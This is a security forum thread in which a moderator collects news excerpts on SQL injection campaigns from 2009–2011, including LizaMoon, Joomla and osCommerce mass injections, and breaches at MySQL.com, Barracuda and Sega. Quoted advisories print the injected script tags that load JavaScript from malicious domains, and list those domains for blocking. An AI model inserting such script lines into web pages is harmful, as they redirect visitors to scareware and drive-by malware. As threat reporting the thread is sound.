News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
August 20, 2014, 12:25:56
Pages: [1] 2   Go Down
  Print  
Topic: SQL injection attacks...  (Read 15233 times)
0 Members and 1 Guest are viewing this topic.
« on: July 16, 2009, 02:21:27 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

(MS Office Web Components) OWC exploits used in SQL injection attacks
- http://isc.sans.org/diary.html?storyid=6811
Last Updated: 2009-07-16 08:38:21 UTC - "... The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code... they are injecting a script code pointing to f1y .in, which is a known bad domain. This script contains links to two other web sites (www .jatrja .com and js.tongji. linezing .com [DO NOT VISIT]) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability. The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link*) – only 15 AV programs detecting it, luckily, some major AV vendors are there. If you haven't set those killbits** yet, be sure that you do now because the number of sites exploiting this vulnerability will probably rise exponentially soon."
* http://www.virustotal.com/analisis/055757dfc4ffd9a3bc1a53fe965881dfb56268bfc7833968a1b26675376dda0a-1247733262

** http://support.microsoft.com/kb/973472#FixItForMe

- http://blog.trendmicro.com/massive-sql-injection-ensues/
July 17, 2009

 Shocked Evil or Very Mad Questioning or Suspicious
« Last Edit: November 10, 2009, 14:43:00 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #1 on: July 27, 2009, 15:10:01 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

 Shocked Evil or Very Mad
« Last Edit: July 28, 2009, 02:45:23 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #2 on: November 10, 2009, 14:45:43 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

- http://sunbeltblog.blogspot.com/2009/11/3100-vulnerabilities-connected-with-web.html
November 10, 2009 - "If anyone ever needed a great example for the lectures they give friends, relatives or employees about the importance of installing software updates, here it is. Security firm Cenzic* has made public a report documenting 3,100 vulnerabilities that affect the software used on web sites and in browsers! The report included patched and unpatched vulnerabilities. Cenzic, which provides software as a service, said in their report “Web Application Security Trends Report Q1-Q2, 2009” that Cross Site Scripting and SQL Injection vulnerabilities were a factor in half of all web attacks. They said 87 per cent of web applications their researchers looked at "had serious vulnerabilities that could potentially lead to the exposure of sensitive or confidential user information during transactions"..."
* http://www.cenzic.com/resources_reg-not-required_trends/
Q1-Q2 2009
http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf

 Shocked
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #3 on: February 23, 2010, 08:41:37 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Automated SQL injection attacks...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=223100129
Feb. 22, 2010 - "SQL injections top plenty of lists as the most prevalent means of attacking front-end Web applications and back-end databases to compromise data... analysis of the Web Hacking Incidents Database* (WHID) shows SQL injections as the top attack vector, making up 19 percent of all security breaches examined by WHID. Similarly, in the "Breach Report for 2010" (PDF) released by 7Safe* earlier this month, a whopping 60 percent of all breach incidents examined involved SQL injections... criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems... the purpose of those attacks is really to inject JavaScript redirectors into Web pages so that legitimate Web pages end up redirecting their users to exploit toolkits..."
* http://webappsec.pbworks.com/Web-Hacking-Incident-Database

** http://7safe.com/breach_report/Breach_report_2010.pdf

 Shocked
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #4 on: March 09, 2010, 19:06:18 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

WordPress injection attack
- http://securitylabs.websense.com/content/Blogs/3577.aspx
03.09.2010 - "... Websense... has been monitoring the latest WordPress injection attack for over 2 weeks and has found over 250,000 injections occurring in the past half month. Moreover, over 37,000 URLs in the wild are still being injected according to our observations... the daily stats go up and down a few times and always end up higher, so we believe the hackers are still continuing their attack... WordPress is so widely used all over the world that every version of it is studied and exploited by hackers, even the latest version (2.9.2, released on December 18, 2009)... The ultimate purpose of the attack is all about making money, as Sophos has already investigated*... These attacks probably happened due to SQL injection via some known and unknown WordPress vulnerabilities... Injection is not the only way for hackers to utilize those vulnerabilities; compromising a site is also a good option. It has often been reported that compromised Web sites are used for Blackhat SEO to push rogue AVs. Novirusthanks has a great analysis here**, and more investigation indicates that the compromise behind the attack is connected to WordPress vulnerabilities... WordPress users should be very familiar with the injection or compromise attack since it has been used frequently in the past. Although WordPress has 2-3 releases every year and has 3 releases planned this year as usual, it has proved to be not enough: we still can see many victimized sites with the latest 2.9.2 installation..."

(More detail and screenshots available at the Websense URL above.)

* http://www.sophos.com/blogs/sophoslabs/?p=8498

** http://blog.novirusthanks.org/2009/11/more-than-100-websites-compromised-for-blackhat-seo-strategy/

 Evil or Very Mad Shocked
« Last Edit: March 09, 2010, 19:10:51 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #5 on: November 22, 2010, 11:42:17 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Websense in error blaming WordPress ...
- http://www.whitefirdesign.com/news/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/
November 15, 2010 - "In Websense’s 2010 Threat Report they listed WordPress Attacks as one of the significant events of the year**... The hacks they refer to were actually hacks that targeted hosting providers that would allow malicious code to be added to websites hosted with the provider whether they were running WordPress, other software, or no software at all. In most of the hacks the malicious code was placed in all files that had a .php extension. WordPress, by the nature of being the most popular web software, was the most of often affected, but all web software that have files with a .php extension were also affected. In other cases the hacks targeted database fields specific to WordPress, but they could have affected any other software that utilized a database if the hacker had chose to target them instead of WordPress. Websense is not alone is making these false claims, other supposed security experts also made similar claims and some hosting provider have attempted to lame blame on WordPress. Network Solutions was the only one to later apologize for blaming WordPress...*"
* http://blog.networksolutions.com/2010/wordpress-is-not-the-issue/

** http://www.websense.com/content/threat-report-2010-wordpress.aspx

 Shocked
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #6 on: March 28, 2011, 04:53:31 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

MySQL and Sun hacked...
- http://nakedsecurity.sophos.com/2011/03/27/mysql-com-and-sun-hacked-through-sql-injection/
March 27, 2011 - "Proving that no website is ever truly secure, it is being reported that MySQL.com has succumbed to an SQL injection attack. It was first disclosed to the Full Disclosure mailing list*... Several accounts had passwords like "qa". The irony is that they weren't compromised by means of their ridiculously simple passwords, but rather flaws in the implementation of their site... MySQL's parent company Sun/Oracle has also been attacked**. Both tables and emails were dumped from their databases, but no passwords. It does not appear to be a vulnerability in the MySQL software, but rather flaws in the implementation of their websites... It was noted on Twitter that mysql .com is also subject to an XSS (cross-site scripting) vulnerability that was reported in January 2011 and has not been remedied."  
*  http://seclists.org/fulldisclosure/2011/Mar/309?utm_source=twitterfeed&utm_medium=twitter

** http://tinkode27.baywords.com/sun-com-sun-mycrosystems-vulnerable-sql-injection/

- http://blog.sucuri.net/2011/03/mysql-com-compromised.html
March 27, 2011 - "... If you have an account on MySQL.com, we recommend changing your passwords ASAP..."

- https://www.computerworld.com/s/article/9215249/MySQL_Web_site_falls_victim_to_SQL_injection_attack
March 28, 2011

 Frustrated
« Last Edit: March 28, 2011, 05:56:26 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #7 on: March 29, 2011, 15:33:25 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

SQL mass injection hits over 28,000 URLs including iTunes
- http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
29 Mar 2011 - "Websense... has identified a new malicious mass-injection campaign that we call LizaMoon...
The LizaMoon mass-injection is a SQL injection attack...
< script src=hxxp ://lizamoon .com/ur.php></script >
According to a Google Search, over 28,000 URLs have been compromised. This includes several iTunes URLs... The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site:
 hxxp ://defender-uqko .in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet. The domain lizamoon .com was registered three days ago with clearly fake information... We'll keep monitoring this mass-injection attack and provide updated information as it's available."
(Screenshots and more detail available at the Websense URL above.)
___

urgent block: lizamoon .com and defender-uqko .in
- http://www.malwaredomains.com/wordpress/?p=1728
March 30th, 2011 - "Websense... is reporting a mass sql injection attack of over 28000 sites... We’ll be adding this site (and defender-uqko .in) on tonight’s update, but you shouldn’t wait... add these sites to your blocklists ASAP."
___

- http://centralops.net/co/DomainDossier.aspx
Registrar: BIZCN.COM, INC...
Created: 2011-03-25 ...
91.213.29.182
organisation: ORG-IM15-RIPE
org-name: Info-Media Ltd
org-type: OTHER
address: Rastochnaya 31
address: Yekaterinburg, 620050, Russia
country: RU
... Information related to '91.213.29.0/24 AS51247...
- http://google.com/safebrowsing/diagnostic?site=AS:51247
"... appeared to function as intermediaries for the infection of 60 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days..."

 Evil or Very Mad Evil or Very Mad Evil or Very Mad
« Last Edit: March 30, 2011, 12:19:12 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #8 on: March 31, 2011, 02:26:40 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

380,000 226,000 28000 URLs whacked...
- http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
2011-03-31 01:58
"UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon .com."

 Evil or Very Mad Evil or Very Mad Evil or Very Mad
« Last Edit: March 31, 2011, 15:15:36 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #9 on: April 01, 2011, 02:11:37 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Update on LizaMoon mass-injection...
- http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
31 Mar 2011 - "The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon .com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down... All the code does is a redirect to a rogue AV site..."
(Screenshots and more detail at the Websense URL above.)

- http://isc.sans.edu/diary.html?storyid=10642
Last Updated: 2011-04-01 21:49:17 UTC - "... There doesn't seem to be anything particularly new about the infection mechanism (aside of the scope of its success) and the injection itself only inserts a random snippet of HTML to redirect victims to a rogue AV site that tells the user they are infected. One of the domains implicated in this attack was registered in October and showed up on the radar in December, so it appears the preparation of this attack has taken some time... Infected sites tend to use the same URL structure including a file "ur.php". It appears this is only affecting sites using Microsoft SQL Server 2003/2005. Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e. filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory..."
- http://isc.sans.edu/tag.html?tag=sql%20injection

- http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
"... The count only looks at unique URLs, not infected hosts, a more meaningful metric. Even so the assault still counts as among the most widespread mass-injection attacks on record..."

- http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
March 31, 2011 - "... monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certain URLs that lead to malware such as FAKEAV... We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others..."

- http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
March 31, 2011 - "... the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis... Upon successful redirection, the campaign attempts to load the scareware domains..."
(More detail at the ddanchev.blogspot URL above.)
- http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301586582
File name: freesystemscan.exe
Submission date: 2011-03-31 15:49:42 (UTC)
Current status: finished
Result: 9/41 (22.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c-1301722562
File name: a.exe
Submission date: 2011-04-02 05:36:02 (UTC)
Result: 24/42 (57.1%)
___

Lizamoon SQL Injection: 7 Months Old and Counting
- http://blog.scansafe.com/journal/2011/4/1/lizamoon-sql-injection-7-months-old-and-counting.html
April 1, 2011 - "...part of a continuous SQLi attack that spans the past seven months... 40+ malware domains... have been used in the ongoing injection attacks..."

- http://nakedsecurity.sophos.com/2011/04/01/lizamoon-sql-injection/
April 1, 2011

 Evil or Very Mad
« Last Edit: April 05, 2011, 04:04:49 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #10 on: April 05, 2011, 04:06:54 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

- http://blog.sucuri.net/2011/04/lizamoon-mass-sql-injection-ur-php-updates.html
April 4, 2011 - "... good way to check if your site is infected, is by using our malware scanner*. If you see IIS:4 as the malware code, you know what happened..."
* http://sitecheck.sucuri.net/scanner/

 Exclamation Exclamation
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #11 on: April 07, 2011, 08:38:40 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Database Injection on Joomla Websites...
- http://blog.sucuri.net/2011/04/database-injection-on-joomla-sites-yourstatscounter-cz-cc.html
April 6, 2011 - "It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point). This is what is being added to the infected sites (at the top of every post in the jos_content table):
    < script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js" >< /script >
There are many others domains being used in this attack, including:
    http ://faststatscounter.co.cc/statscounter01935 .js
    http ://yourstatscounter.cz.cc/statscounter301 .js
    http ://yourstatscounter.co.cc/statscounter307 .js
    http ://easystatscounter.co.cc/statscounter12 .js
    http ://supergoogleanalytics.co.cc/
Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.... site might be hacked(?), check it using our malware scanner*..."
* http://sitecheck.sucuri.net/

- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=faststatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=yourstatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=easystatscounter.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=supergoogleanalytics.co.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
___

Thousands of osCommerce sites infected...
- http://blog.sucuri.net/2011/04/continuing-attacks-against-oscommerce-khcol-com.html
April 5, 2011 - "... we are seeing thousands of osCommerce sites infected with a malware pointing to http ://khcol .com...
> Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon...
> Update 2: Other domains being used in this attack: solomon-xl .cz.cc, thescannerantiv .com, searchableantiv .com, www1 .checker-network-hard .cz.cc and many others."

- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=khcol.com/
"... last time suspicious content was found on this site was on 2011-04-08... Malicious software includes 2861 scripting exploit(s), 64 trojan(s), 1 exploit(s)...  Over the past 90 days, khcolm .com appeared to function as an intermediary for the infection of 1149 site(s)... This site was hosted on 1 network(s) including AS17408..."
- http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:17408
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... The last time Google tested a site on this network was on 2011-04-07, and the last time suspicious content was found was on 2011-04-07... we found 5 site(s) on this network... that appeared to function as intermediaries for the infection of 1152 other site(s)..."

- http://google.com/safebrowsing/diagnostic?site=solomon-xl.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=thescannerantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=searchableantiv.com/
"Site is listed as suspicious - visiting this web site may harm your computer..."
- http://google.com/safebrowsing/diagnostic?site=checker-network-hard.cz.cc/
"Site is listed as suspicious - visiting this web site may harm your computer..."

 Evil or Very Mad
« Last Edit: April 08, 2011, 13:02:27 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #12 on: April 12, 2011, 08:28:01 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Barracuda Networks - hacked via a SQL injection attack
- http://www.darkreading.com/taxonomy/index/printarticle/id/229401358
Apr 11, 2011 - "... Barracuda Networks*... confirmed that its corporate website indeed had been hacked via an SQL injection attack, and names and emails of customer and partners, including some hashes of salted passwords, exposed..."
* http://blog.barracuda.com/pmblog/index.php/2011/04/12/waf-importance/

 Sad Evil or Very Mad
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #13 on: April 19, 2011, 16:28:49 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



FYI...

Mass Injections Leading to g01pack Exploit Kit
- http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx
19 Apr 2011 - "... detected a new injection attack which leads to an obscure Web attack kit. The injection has three phases... The first phase of the attack is a typical vector** for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge. In this case, legitimate sites are injected with malicious JavaScript... In the second phase, this script injection then pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site... The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack. Its intent is to scan, attack, and run malicious code on the visitor's computer. If -one- of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer. The binary that this kit tries to run on target computers has low detection* as a Rogue AV installation. As is typical, the exploit kit's Web attack code is obfuscated... We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool..."
* http://www.virustotal.com/file-scan/report.html?id=3964200e5891702fc64f57b0db9e4488a65e4793c27fda8f869f6fded35756a1-1303197157
File name: JwWeagugDQKT.exe
Submission date: 2011-04-19 07:12:37 (UTC)
Result: 15/42 (35.7%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=3964200e5891702fc64f57b0db9e4488a65e4793c27fda8f869f6fded35756a1-1303729645
File name: JwWeagugDQKT.exe
Submission date: 2011-04-25 11:07:25 (UTC)
Result: 30/40 (75.0%)

** http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx
29 Mar 2011

 Evil or Very Mad
« Last Edit: May 07, 2011, 02:41:45 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #14 on: June 19, 2011, 12:48:33 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8210



Online -everything- hacked, or so it seems.

- http://www.reuters.com/article/2011/06/19/us-sega-hackers-idUSL3E7HJ01520110619
Jun 19, 2011 - "... Sega Corp said on Sunday that information belonging to 1.3 million customers has been stolen from its database, the latest in a rash of global cyber attacks against video game companies. Names, birth dates, e-mail addresses and encrypted passwords of users of Sega Pass online network members had been compromised, Sega said in a statement, though payment data such as credit card numbers was safe. Sega Pass had been shut down... The attack against Sega, a division of Sega Sammy Holdings that makes game software such as Sonic the Hedgehog as well as slot machines, follows other recent significant breaches including Citigroup, which said over 360,000 accounts were hit in May, and the International Monetary Fund... surrounding the recent round of video game breaches paled compared to what PlayStation maker Sony Corp experienced following two high-profile attacks that surfaced in April. Those breaches led to the theft of account data for more than 100 million customers, making it the largest ever hacking of data outside the financial services industry..."

- http://www.theregister.co.uk/2011/06/20/sega_onemillion_hacked/
20 June 2011 - "... if the same login information is used for other websites or services, they need to be changed immediately..."

- http://www.fortiguard.com/reports/roundup_06_17_2011.html
June 17 2011

 Shocked Evil or Very Mad Sad
« Last Edit: June 19, 2011, 20:40:55 by AplusWebMaster » Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
 
Pages: [1] 2   Go Up
  Print  
 
Jump to:  

Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Page created in 0.879 seconds with 19 queries.